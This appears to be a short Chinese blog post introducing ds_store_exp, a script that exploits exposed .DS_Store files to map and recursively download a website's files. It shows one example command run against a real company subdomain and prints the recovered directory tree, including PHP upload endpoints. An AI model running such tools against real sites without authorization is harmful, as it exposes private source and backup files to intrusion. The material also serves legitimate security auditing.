https://github.com/lijiejie/ds_store_exp

.DS_Store是Mac下Finder用来保存如何展示文件/文件夹的数据文件，每个文件夹下对应一个。

如果开发/设计人员将.DS_Store上传部署到线上环境，可能造成文件目录结构泄漏，特别是备份文件、源代码文件。

ds_store_exp 是一个.DS_Store 文件泄漏利用脚本，它解析.DS_Store文件并递归地下载文件到本地： https://github.com/lijiejie/ds_store_exp

DS_Store parser is based on ds_store 1.1.0 。

一个示例

python ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store

hd.zj.qq.com/

└── themes

└── galaxyw

├── app

│ └── css

│ └── style.min.css

├── cityData.min.js

├── images

│ └── img

│ ├── bg-hd.png

│ ├── bg-item-activity.png

│ ├── bg-masker-pop.png

│ ├── btn-bm.png

│ ├── btn-login-qq.png

│ ├── btn-login-wx.png

│ ├── ico-add-pic.png

│ ├── ico-address.png

│ ├── ico-bm.png

│ ├── ico-duration-time.png

│ ├── ico-pop-close.png

│ ├── ico-right-top-delete.png

│ ├── page-login-hd.png

│ ├── pic-masker.png

│ └── ticket-selected.png

└── member

├── assets

│ ├── css

│ │ ├── ace-reset.css

│ │ └── antd.css

│ └── lib

│ ├── cityData.min.js

│ └── ueditor

│ ├── index.html

│ ├── lang

│ │ └── zh-cn

│ │ ├── images

│ │ │ ├── copy.png

│ │ │ ├── localimage.png

│ │ │ ├── music.png

│ │ │ └── upload.png

│ │ └── zh-cn.js

│ ├── php

│ │ ├── action_crawler.php

│ │ ├── action_list.php

│ │ ├── action_upload.php

│ │ ├── config.json

│ │ ├── controller.php

│ │ └── Uploader.class.php

│ ├── ueditor.all.js

│ ├── ueditor.all.min.js

│ ├── ueditor.config.js

│ ├── ueditor.parse.js

│ └── ueditor.parse.min.js

└── static

├── css

│ └── page.css

├── img

│ ├── bg-table-title.png

│ ├── bg-tab-say.png

│ ├── ico-black-disabled.png

│ ├── ico-black-enabled.png

│ ├── ico-coorption-person.png

│ ├── ico-miss-person.png

│ ├── ico-mr-person.png

│ ├── ico-white-disabled.png

│ └── ico-white-enabled.png

└── scripts

├── js

└── lib

└── jquery.min.js

21 directories, 48 files

.DS_Store文件泄漏利用工具: ds_store_exp

一个示例

猜你喜欢